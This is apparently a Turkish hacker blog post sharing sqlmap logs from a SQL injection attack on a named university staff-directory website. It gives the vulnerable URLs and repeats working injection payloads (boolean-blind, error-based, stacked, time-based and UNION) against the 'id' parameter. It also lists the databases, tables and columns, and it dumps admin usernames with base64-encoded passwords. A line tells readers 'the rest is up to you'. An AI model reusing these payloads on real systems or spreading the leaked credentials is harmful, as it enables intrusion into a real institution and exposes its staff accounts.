dr4cula
#imhatimi
today | : | at : | safemode : ON
> / home / dr4cula / public_html /
name author perms com modified label

Bazi Paylasilmis SQL Datalari dr4cula rwxr-xr-x 0 23:55


Filename Bazi Paylasilmis SQL Datalari
Permission rw-r--r--
Author dr4cula
Date and Time 23:55
Label
Action
http://alhikmah.edu.ng/staff_dir/
http://alhikmah.edu.ng/staff_dir/admin/
Direk Sqlmap'ten cektim loglari artik gerisi sizde kolay gelsin :)


sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
available databases [2]:
[*] alhikmah_staffdir
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
[8 tables]
+------------------+
| course_detail    |
| departments      |
| faculties        |
| lecturer_profile |
| programs         |
| title_tb         |
| userinfo         |
| userlogin        |
+------------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
[8 tables]
+------------------+
| course_detail    |
| departments      |
| faculties        |
| lecturer_profile |
| programs         |
| title_tb         |
| userinfo         |
| userlogin        |
+------------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
Table: userlogin
[6 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| eMail    | varchar(250) |
| id       | int(11)      |
| password | blob         |
| status   | varchar(30)  |
| type     | varchar(250) |
| userName | varchar(250) |
+----------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
Table: userlogin
[4 entries]
+-------------+------------------+
| userName    | password         |
+-------------+------------------+
| admin2018   | d2lzZG9tOTlAQA== |
| odeyale2017 | b2RleWFsZTIwMTc= |
| abdul2018   | d2lzZG9tOTlAQA== |
| sdfdsfsd    | ZmRzZmRz         |
+-------------+------------------+

0 yorum: